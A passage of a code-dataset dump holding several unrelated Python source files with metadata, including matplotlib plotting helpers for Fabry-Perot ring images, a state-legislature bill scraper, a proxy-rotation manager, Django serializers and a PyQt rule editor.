bins=bins)\n else:\n hist, bins = np.histogram(data, density=True, bins='auto')\n\n hist *= 100.0\n\n bw = bins[1] - bins[0]\n\n if horizontal:\n ax.barh(bins[0:-1], hist * bw, height=bw)#, color='dimgray') # , alpha=0.5)\n if data.max() > 1000:\n ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n else:\n ax.get_yaxis().get_major_formatter().set_scientific(True)\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n else:\n ax.bar(bins[0:-1], hist * bw, width=bw)#, color='dimgray') # , alpha=0.5)\n if data.max() > 1000:\n # I don't think this works\n # ax.get_xaxis().get_major_formatter().set_scientific(True)\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0, 0))\n else:\n ax.get_xaxis().get_major_formatter().set_scientific(True)\n\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n return bins\n\n\ndef my_hist2d(ax, data1, data2, bins=None, z=30):\n \"\"\"Custom 2d histrogram option for plotting correlations\n\n Args:\n ax (matplotlib.axes.Axes): axes to plot with\n data1 (np.ndarray): array of values to histogram\n data2 (np.ndarray): other array of values\n bins (int, optional): number of bins in histogram\n z (int): number of filled contours\n\n Returns:\n matplotlib.colorbar.Colorbar: colorbar from the 2d histogram\n \"\"\"\n if bins is not None:\n hist, xx, yy = np.histogram2d(data1, data2, normed=True, bins=bins)\n else:\n hist, xx, yy = np.histogram2d(data1, data2, normed=True)\n\n dx = xx[1] - xx[0]\n dy = yy[1] - yy[0]\n\n im = ax.contourf(yy[0:-1], xx[0:-1], hist * dx * dy, z)\n # ax_divider = make_axes_locatable(ax)\n # cax = ax_divider.append_axes(\"right\", size=\"7%\", pad=\"2%\")\n cb = plt.colorbar(im, ax=ax)\n\n if data1.max() > 1000:\n # ax.get_yaxis().get_major_formatter().set_scientific(True)\n ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n else:\n ax.get_yaxis().get_major_formatter().set_scientific(False)\n if data2.max() > 1000:\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0, 0))\n # ax.get_xaxis().get_major_formatter().set_scientific(True)\n else:\n ax.get_xaxis().get_major_formatter().set_scientific(False)\n\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n return cb\n\n\nclass ClickBuilder:\n \"\"\"Little class for interactive plot features\n\n Attributes:\n x (list): x values from clicking\n y (list): y values from clicking\n fig (matplotlib.figure.Figure): matplotlib figure to get clicks from\n cid (int): id for the matplotlib callback\n \"\"\"\n\n def __init__(self, fig):\n self.x = []\n self.y = []\n self.fig = fig\n self.cid = fig.canvas.mpl_connect('button_press_event', self.onclick)\n\n def onclick(self, event):\n \"\"\"Callback function for registering matplotlib clicks. X and Y values are stored in self.x and self.y\n \n Args:\n event (matplotlib.backend_bases.LocationEvent): matplotlib location event\n \"\"\"\n self.x.append(event.xdata)\n self.y.append(event.ydata)\n\n\ndef center_plot(data, x0=None, y0=None):\n \"\"\"Runs clickable center plot for an image\n\n Args:\n data (np.ndarray): pixel values for image\n x0 (float, default=None): x center for zoomed image, if\n none will use the center of data array\n y0 (float, default=None): y center for zoomed image, if\n none will use the cneter of data array\n Returns:\n Tuple (float, float): x value of click guess, y value of click guess\n \"\"\"\n if x0 is None:\n x0 = data.shape[1] / 2.\n if y0 is None:\n y0 = data.shape[0] / 2.\n dx = int(0.3 * x0)\n dy = int(0.3 * y0)\n\n fig, axs = plt.subplots(1, 2, figsize=(12, 6))\n cb = axs[0].imshow(data, cmap='gray', origin='lower')\n axs[0].add_patch(Rectangle((x0 - dx, y0 - dy), 2 * dx, 2 * dy, lw=2, linestyle='--', ec='red', fc='none'))\n divider = make_axes_locatable(axs[0])\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(cb, cax=cax)\n axs[1].imshow(data, cmap='gray', origin='lower')\n axs[1].set_title('Click for center guess')\n plt.setp(axs[1].spines.values(), color='red')\n [i.set_linewidth(5) for i in axs[1].spines.itervalues()]\n [i.set_linestyle('--') for i in axs[1].spines.itervalues()]\n axs[1].set_ylim(y0 - dy, y0 + dy)\n axs[1].set_xlim(x0 - dx, x0 + dy)\n\n center_guess = ClickBuilder(fig)\n plt.tight_layout()\n plt.show()\n fig.canvas.mpl_disconnect(center_guess.cid)\n return center_guess.x[0], center_guess.y[0]\n\n\ndef ringsum_click(r, sig, title='Click Me!'):\n \"\"\"Runs clickable ringsum plot\n\n Args:\n r (np.ndarray): bin values\n sig (np.ndarray): ringsum values\n title (str): instructions for clicker displayed as plot title\n\n Returns:\n Tuple (list, list): x value(s) of click(s), y value(s) of click(s)\n \"\"\"\n fig, axs = plt.subplots(figsize=(10, 6))\n axs.plot(r, sig, lw=2)\n axs.set_title(title, fontsize=22)\n axs.set_xlabel('R (pixels)', fontsize=18)\n axs.set_ylabel('Counts', fontsize=18)\n clicks = ClickBuilder(fig)\n plt.show()\n fig.canvas.mpl_disconnect(clicks.cid)\n return clicks.x, clicks.y\n\n\ndef peak_plot(r, sig, peaks, peaks_sd, orders, fax=None, anspks=None, anspks_sd=None):\n \"\"\"Plots ringsum data with labeled peaks and orders\n\n Args:\n r (np.ndarray): r array from ringsum\n sig (np.ndarray): ringsum signal\n peaks (dict): dictionary of peak locations\n the keys are the wavelengths\n peaks_sd (dict): dictionary of peak errors\n orders (dict): dictionary of peak orders\n the keys are the wavelengths\n fax (tuple, default=None): the figure and axis\n handles for the plot, if adding to existing\n plot. Default is None, which will make a\n new set of figure and axes and run plt.show()\n anspks (dict): dictionary with peak answers from multinest\n anspks_sd (dict): dictionary with peak sd answers from multinest\n \"\"\"\n if fax is None:\n fig, ax = plt.subplots(figsize=(10, 6))\n else:\n fig, ax = fax\n\n colors = tableau20_colors()\n ax.plot(r ** 2, sig, 'o-', color=colors[0], lw=2)\n i = 1\n for key in peaks.keys():\n for j, pk in enumerate(peaks[key]):\n pk_sd = 2. * pk * peaks_sd[key][j] / 2.0 # binwidth / 2.0\n ax.axvspan(pk ** 2 - pk_sd, pk ** 2 + pk_sd, color=colors[i],\n label='{0}: j={1}'.format(key, orders[key][j]), alpha=0.7)\n i += 1\n if i > len(colors):\n i = 0\n if anspks is not None:\n anspk = anspks[key][j]\n anspk_sd = 2. * anspk * anspks_sd[key][j]\n ax.axvspan(anspk ** 2 - anspk_sd, anspk ** 2 + anspk_sd, color=colors[i],\n label='{0}: j={1} multinest'.format(key, orders[key][j]), alpha=0.7)\n i += 1\n if i > len(colors):\n i = 0\n ax.legend(fontsize=14)\n ax.set_xlabel(r'R$^{2}$', fontsize=18)\n ax.set_ylabel('Counts', fontsize=18)\n\n if fax is None:\n plt.show()\n else:\n return\n\n\ndef ring_plot(data, fax=None, block=True):\n \"\"\"Plots the Fabry Perot ring image\n \n Args:\n data (np.ndarray): 2D image data\n fax (tuple, optional): figure and axis\n block (bool): True if you want plt.show(block=True)\n \"\"\"\n if fax is None:\n fig, ax = plt.subplots(figsize=(10, 8))\n else:\n fig, ax = fax\n\n cb = ax.imshow(data, cmap='Greys_r', origin='lower', interpolation=None)\n #cb = ax.imshow(data, cmap='Greys_r', interpolation=None)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(cb, cax=cax, extend='max')\n if fax is not None:\n return\n else:\n plt.show(block=block)\n", "repo_name": "jmilhone/fabry_perot", "sub_path": "fabry/tools/plotting.py", "file_name": "plotting.py", "file_ext": "py", "file_size_in_byte": 9554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 156, "usage_type": "call"}, {"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}]} +{"seq_id": "20202794668", "text": "# -*- coding: utf-8 -*-\nimport logging\n\nfrom autoanswer.answerBwyx import AnswerBwyx\nfrom autoanswer.answerCddh import AnswerCddh\nfrom autoanswer.answerQdt import AnswerQdt\nfrom autoanswer.answerTnwz import AnswerTnwz\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S')\n\nif __name__ == '__main__':\n applicationNum = input(\"please select application(0:头脑王者,1:趣答题,2:冲顶大会,3:百万英雄,default:头脑王者):\")\n if applicationNum == '0':\n # 头脑王者\n AnswerTnwz().run()\n elif applicationNum == '1':\n # 趣答题\n AnswerQdt().run()\n elif applicationNum == '2':\n # 冲顶大会\n AnswerCddh().run()\n elif applicationNum == '3':\n # 百万英雄\n AnswerBwyx().run()\n else:\n # 默认头脑王者\n AnswerTnwz().run()\n", "repo_name": "Alan3058/python-study", "sub_path": "src/autoanswer/answerAuto.py", "file_name": "answerAuto.py", "file_ext": "py", "file_size_in_byte": 970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 9, "usage_type": "attribute"}, {"api_name": "autoanswer.answerTnwz.AnswerTnwz", "line_number": 17, "usage_type": "call"}, {"api_name": "autoanswer.answerQdt.AnswerQdt", "line_number": 20, "usage_type": "call"}, {"api_name": "autoanswer.answerCddh.AnswerCddh", "line_number": 23, "usage_type": "call"}, {"api_name": "autoanswer.answerBwyx.AnswerBwyx", "line_number": 26, "usage_type": "call"}, {"api_name": "autoanswer.answerTnwz.AnswerTnwz", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "17336879364", "text": "import logging\r\n\r\n\r\ndef read_input(text_file_name):\r\n logging.info(\"In: read_input()\")\r\n lines = None\r\n\r\n with open(text_file_name) as f:\r\n lines = f.read()\r\n\r\n split_lines = lines.splitlines()\r\n \r\n logging.info(\"Out: read_input()\")\r\n return split_lines\r\n\r\n\r\nif __name__ == \"__main__\":\r\n result = read_input('sample.txt')\r\n\r\n total = 0\r\n\r\n scoring_table = {\r\n 'A X': 3,\r\n 'B X': 1,\r\n 'C X': 2,\r\n 'A Y': 4,\r\n 'B Y': 5,\r\n 'C Y': 6, \r\n 'A Z': 8,\r\n 'B Z': 9,\r\n 'C Z': 7 \r\n }\r\n\r\n for i in result:\r\n total += scoring_table[i]\r\n \r\n print(f'Total Score: { total }')", "repo_name": "raymond-gines/AdventOfCode2022", "sub_path": "src/day-2/src.py", "file_name": "src.py", "file_ext": "py", "file_size_in_byte": 680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.info", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "29838035727", "text": "import re\nimport datetime\n\nfrom fiftystates.scrape import NoDataForPeriod\nfrom fiftystates.scrape.bills import BillScraper, Bill\nfrom fiftystates.scrape.votes import Vote\nfrom fiftystates.scrape.pa import metadata\nfrom fiftystates.scrape.pa.utils import (bill_abbr, start_year,\n parse_action_date,\n bill_list_url, history_url, info_url,\n vote_url)\n\nimport lxml.html\n\n\ndef action_type(action):\n return 'other'\n\n\nclass PABillScraper(BillScraper):\n state = 'pa'\n\n def scrape(self, chamber, year):\n term = None\n for t in metadata['terms']:\n if t['name'] == \"%s-%d\" % (year, int(year) + 1):\n term = t\n break\n else:\n raise NoDataForYear(year)\n\n for session in term['sessions']:\n match = re.search(\"#(\\d+)\", session)\n if match:\n self.scrape_session(chamber, session, int(match.group(1)))\n else:\n self.scrape_session(chamber, session)\n\n def scrape_session(self, chamber, session, special=0):\n url = bill_list_url(chamber, session, special)\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n for link in page.xpath('//a[contains(@href, \"billinfo\")]'):\n self.parse_bill(chamber, session, special, link)\n\n def parse_bill(self, chamber, session, special, link):\n bill_num = link.text.strip()\n bill_type = re.search('type=(B|R|)', link.attrib['href']).group(1)\n bill_id = \"%s%s %s\" % (bill_abbr(chamber), bill_type, bill_num)\n\n url = info_url(chamber, session, special, bill_type, bill_num)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n title = page.xpath(\n \"//td[text() = 'Short Title:']/following-sibling::td\")[0]\n title = title.text.strip()\n\n bill = Bill(session, chamber, bill_id, title)\n bill.add_source(url)\n\n self.parse_bill_versions(bill, page)\n\n self.parse_history(bill, history_url(chamber, session, special,\n bill_type, bill_num))\n\n self.parse_votes(bill, vote_url(chamber, session, special,\n bill_type, bill_num))\n\n self.save_bill(bill)\n\n def parse_bill_versions(self, bill, page):\n for link in page.xpath(\n '//div[@class=\"pn_table\"]/descendant::a[@class=\"link2\"]'):\n\n bill.add_version(\"Printer's No. %s\" % link.text.strip(),\n link.attrib['href'])\n\n def parse_history(self, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n self.parse_sponsors(bill, page)\n self.parse_actions(bill, page)\n\n def parse_sponsors(self, bill, page):\n first = True\n for link in page.xpath(\n \"//td[text() = 'Sponsors:']/../descendant::a\"):\n\n if first:\n sponsor_type = 'primary'\n first = False\n else:\n sponsor_type = 'cosponsor'\n\n bill.add_sponsor(sponsor_type, link.text.strip())\n\n def parse_actions(self, bill, page):\n chamber = bill['chamber']\n\n for tr in page.xpath(\"//td[text() = 'Actions:']/\"\n \"following-sibling::td/table/tr\"):\n action = tr.xpath(\"string()\").replace(u'\\xa0', ' ').strip()\n\n if action == 'In the House':\n chamber = 'lower'\n continue\n elif action == 'In the Senate':\n chamber = 'upper'\n continue\n\n match = re.match(\n r\"(.*),\\s+(\\w+\\.?\\s+\\d{1,2},\\s+\\d{4})( \\(\\d+-\\d+\\))?\", action)\n\n if not match:\n continue\n\n action = match.group(1)\n date = parse_action_date(match.group(2))\n bill.add_action(chamber, action, date, type=action_type(action))\n\n def parse_votes(self, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n for td in page.xpath(\"//td[@class = 'vote']\"):\n caption = td.xpath(\"string(preceding-sibling::td)\").strip()\n\n location = ''\n if caption == 'Senate':\n chamber = 'upper'\n elif caption == 'House':\n chamber = 'lower'\n else:\n continue\n\n self.parse_chamber_votes(chamber, bill,\n td.xpath('a')[0].attrib['href'])\n\n def parse_chamber_votes(self, chamber, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n for link in page.xpath(\"//a[contains(@href, 'rc_view')]\"):\n vote = self.parse_roll_call(link.attrib['href'])\n # bill.add_vote(vote)\n\n def parse_roll_call(self, url):\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n date = page.xpath(\n \"//div[@class='font8text']\")[1].text.split(',', 1)[1].strip()\n\n # TODO: parse PA's horrible new roll-call vote pages\n return None\n", "repo_name": "runderwood/fiftystates", "sub_path": "fiftystates/scrape/pa/bills.py", "file_name": "bills.py", "file_ext": "py", "file_size_in_byte": 5680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fiftystates.scrape.bills.BillScraper", "line_number": 20, "usage_type": "name"}, {"api_name": "fiftystates.scrape.pa.metadata", "line_number": 25, "usage_type": "name"}, {"api_name": "re.search", "line_number": 33, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.bill_list_url", "line_number": 40, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 43, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 43, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 43, "usage_type": "name"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.bill_abbr", "line_number": 52, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.info_url", "line_number": 54, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 56, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 56, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 56, "usage_type": "name"}, {"api_name": "fiftystates.scrape.bills.Bill", "line_number": 63, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.history_url", "line_number": 68, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.vote_url", "line_number": 71, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 86, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 86, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 86, "usage_type": "name"}, {"api_name": "re.match", "line_number": 118, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.parse_action_date", "line_number": 125, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 131, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 131, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 131, "usage_type": "name"}, {"api_name": "lxml.html.html.fromstring", "line_number": 151, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 151, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 151, "usage_type": "name"}, {"api_name": "lxml.html.html.fromstring", "line_number": 160, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 160, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 160, "usage_type": "name"}]} +{"seq_id": "44518724117", "text": "from rest_framework import serializers\nfrom polls.models import Question\n\nclass QuestionSerializer (serializers.Serializer):\n pk = serializers.Field()\n question_text = serializers.CharField(required=True, max_length=200)\n pub_date = serializers.DateTimeField(required=True)\n \n\n \"\"\" Define function to handle create or update \"\"\"\n def restore_object(self, attrs, instance=None):\n if instance:\n instance.question_text = attrs.get('question_text', instance.question_text)\n instance.pub_date = attrs.get('pub_date', instance.pub_date)\n return instance\n\n return Question(**attrs)\n\n\n\nclass QuestionModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = ('question_text', 'pub_date')\n\n", "repo_name": "shaycohen/django_train", "sub_path": "mysite.REST/polls/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.serializers.Serializer", "line_number": 4, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 4, "usage_type": "name"}, {"api_name": "rest_framework.serializers.Field", "line_number": 5, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "rest_framework.serializers.DateTimeField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "polls.models.Question", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 21, "usage_type": "name"}, {"api_name": "polls.models.Question", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "72335408514", "text": "# coding:utf-8\nfrom SqlDBHelper import ProxyItem, RequestResponseMap\nimport itertools, logging, time\nfrom Handlers import SqlItemHandler, RandomWaitRequestHandler\nfrom Spiders import ProxySpider\nimport GlobalMethod as M\n\nclass ProxyManager(object):\n\tREQUEST_COUNT_THRESHOLD = ProxyItem.DEFAULT_SCORE\n\n\tdef __init__(self, tag=''):\n\t\tself._proxy = None\n\t\tself._proxy_score = None\n\t\tself._cur_proxy_request_count = 0\n\t\tself.session = M.create_engine('proxy' + tag, ProxyItem)\n\n\tdef destroy(self):\n\t\tif self.session:\n\t\t\tself.session.close()\n\t\t\tself.session = None\n\n\tdef crawl_new_proxies(self, proxy_dispatcher):\n\t\tlogging.info('crawl_new_proxies now')\n\t\tProxyItem.clear_all(self.session)\n\t\tproxy_dispatcher.add_item_handler(SqlItemHandler.SqlItemHandler())\n\t\tproxy_dispatcher.add_request_handler(RandomWaitRequestHandler.RandomWaitRequestHandler())\n\t\tspiders = [cls(proxy_dispatcher.get_tag()) for cls in ProxySpider.cls_list]\n\t\tproxy_dispatcher.run(*spiders)\n\n\tdef pick_proxy(self, url):\n\t\tif not self._proxy or self._cur_proxy_request_count > self.REQUEST_COUNT_THRESHOLD:\n\t\t\tself._proxy, self._proxy_score = self._choose_proxy(url)\n\t\t\tlogging.info('try using proxy {}'.format(self._proxy))\n\t\t\tself._cur_proxy_request_count = 0\n\t\treturn self._proxy\n\n\tdef feed_yes_or_no(self, b):\n\t\tif not self._proxy:\n\t\t\treturn #不会这里\n\n\t\tif b:\n\t\t\tself._cur_proxy_request_count += 1\n\t\telse:\n\t\t\tdelta_score = self._get_delta_score()\n\t\t\tself._score_proxy(self._proxy_score + delta_score)#成功多少次就打多少分.所有的一开始是100分,试验一次就知道多少分了\n\t\t\tself._proxy = None#清空\n\n\tdef _get_delta_score(self):\n\t\tif self._cur_proxy_request_count == 1:\n\t\t\treturn 0\n\t\telif self._cur_proxy_request_count > 1:\n\t\t\treturn int(self._cur_proxy_request_count / 2) #适度加分\n\t\telse:\n\t\t\treturn -1#减一分\n\n\tdef _choose_proxy(self, url):\n\t\tif url.startswith('https'):\n\t\t\thttp_type = 'HTTPS'\n\t\telse:\n\t\t\thttp_type = 'HTTP'\n\t\treturn ProxyItem.get_proper_proxy(self.session, http_type)\n\n\tdef _score_proxy(self, score):\n\t\tif self._proxy:\n\t\t\tlogging.info('scoring proxy {} score {}'.format(self._proxy, score))\n\t\t\tProxyItem.set_proxy_score(self.session, self._proxy, score)\n\n", "repo_name": "c0nnyr/MrSpider", "sub_path": "ProxyManager.py", "file_name": "ProxyManager.py", "file_ext": "py", "file_size_in_byte": 2179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "SqlDBHelper.ProxyItem.DEFAULT_SCORE", "line_number": 9, "usage_type": "attribute"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 9, "usage_type": "name"}, {"api_name": "GlobalMethod.create_engine", "line_number": 15, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 15, "usage_type": "argument"}, {"api_name": "logging.info", "line_number": 23, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.clear_all", "line_number": 24, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 24, "usage_type": "name"}, {"api_name": "Handlers.SqlItemHandler.SqlItemHandler", "line_number": 25, "usage_type": "call"}, {"api_name": "Handlers.SqlItemHandler", "line_number": 25, "usage_type": "name"}, {"api_name": "Handlers.RandomWaitRequestHandler.RandomWaitRequestHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "Handlers.RandomWaitRequestHandler", "line_number": 26, "usage_type": "name"}, {"api_name": "Spiders.ProxySpider.cls_list", "line_number": 27, "usage_type": "attribute"}, {"api_name": "Spiders.ProxySpider", "line_number": 27, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.get_proper_proxy", "line_number": 61, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 61, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.set_proxy_score", "line_number": 66, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "22290573548", "text": "from PyQt4 import QtGui, QtCore\n\nfrom editor_qt import Editor\nfrom common import Component, WidgetItemComponent, UNIVERSE_ENTITY\nfrom engine.state import RuleComponent, OP_MAP\nfrom event import Event, EVENT_MAPPING, EVENT_QUEUE, EVENT_MANAGER\n\n\nclass RuleDefinitionEditor(Editor):\n def __init__(self, context):\n super(RuleDefinitionEditor, self).__init__(context,\n QtGui.QGroupBox('Rule'))\n if 'rules' not in self.context:\n self.context['rules'] = list()\n # gui elements\n self.layout = QtGui.QGridLayout()\n self.rule_name_label = QtGui.QLabel('Rule Name')\n self.rule_name_field = QtGui.QLineEdit()\n self.operator_label = QtGui.QLabel('Choose Operator')\n self.operator_list_view = QtGui.QComboBox()\n self.operator_layout = QtGui.QVBoxLayout()\n self.value_label = QtGui.QLabel('Rule Value')\n self.value_field = QtGui.QLineEdit()\n self.rule_list_view = QtGui.QListWidget()\n self.add_rule_button = QtGui.QPushButton('Add Rule')\n self.remove_rule_button = QtGui.QPushButton('Remove Rule')\n self.rule_button_layout = QtGui.QVBoxLayout()\n\n # set up layout\n self.layout.addWidget(self.rule_name_label,0,0)\n self.layout.addWidget(self.rule_name_field,0,1)\n self.operator_layout.addWidget(self.operator_label)\n self.operator_layout.addWidget(self.operator_list_view)\n self.layout.addLayout(self.operator_layout,1,0)\n self.layout.addWidget(self.value_label,1,1)\n self.layout.addWidget(self.value_field,1,2)\n self.layout.addWidget(self.rule_list_view,2,0)\n self.rule_button_layout.addWidget(self.add_rule_button)\n self.rule_button_layout.addWidget(self.remove_rule_button)\n self.layout.addLayout(self.rule_button_layout,2,1)\n\n self.group.setLayout(self.layout)\n \n # add operators\n self.operator_list_view.addItems(OP_MAP.keys())\n\n # wire up events\n self.add_rule_button.clicked.connect(self.add_rule)\n self.remove_rule_button.clicked.connect(self.remove_rule)\n self.rule_list_view.currentItemChanged.connect(self.select_rule)\n\n def add_rule(self):\n rule_name = str(self.rule_name_field.text())\n operator = str(self.operator_list_view.itemText(self.operator_list_view.currentIndex()))\n value = str(self.value_field.text())\n try:\n value = float(value)\n except ValueError:\n pass\n # create rule component\n rule_component = RuleComponent(rule_name, operator, value)\n rule_component_wrapper = Component(rule_component, rule_name)\n widget_component = WidgetItemComponent(rule_name,\n rule_component_wrapper)\n self.rule_list_view.addItem(widget_component)\n\n # add the rule component to the application context\n self.context['rules'].append(rule_component_wrapper)\n\n # fire event for adding rule\n new_event = Event('added_rule',\n rule_component=rule_component_wrapper)\n EVENT_MANAGER.fire_event(new_event)\n\n def remove_rule(self):\n selected_index = self.rule_list_view.currentRow()\n selected_item = self.rule_list_view.takeItem(selected_index)\n selected_component = selected_item.component\n\n # remove rule from application context\n for comp in self.context['rules']:\n if comp == selected_component:\n self.context['rules'].remove(comp)\n break\n\n # fire event for removing rule\n new_event = Event('removed_rule',\n rule_component=selected_component)\n EVENT_MANAGER.fire_event(new_event)\n\n def select_rule(self):\n selected_item = self.rule_list_view.currentItem()\n if selected_item is not None:\n selected_component = selected_item.component\n\n # set field values\n self.rule_name_field.setText(selected_component.text)\n self.value_field.setText(str(selected_component.component.value))\n index = self.operator_list_view.findText(selected_component.component.operator)\n self.operator_list_view.setCurrentIndex(index)\n\n def update(self):\n self.rule_list_view.clear()\n for rule in self.context['rules']:\n widget_component = WidgetItemComponent(rule.text, rule)\n self.rule_list_view.addItem(widget_component)\n", "repo_name": "thagberg/phyte-engine", "sub_path": "phyte/tools/rule_definition_qt.py", "file_name": "rule_definition_qt.py", "file_ext": "py", "file_size_in_byte": 4536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "editor_qt.Editor", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 12, "usage_type": 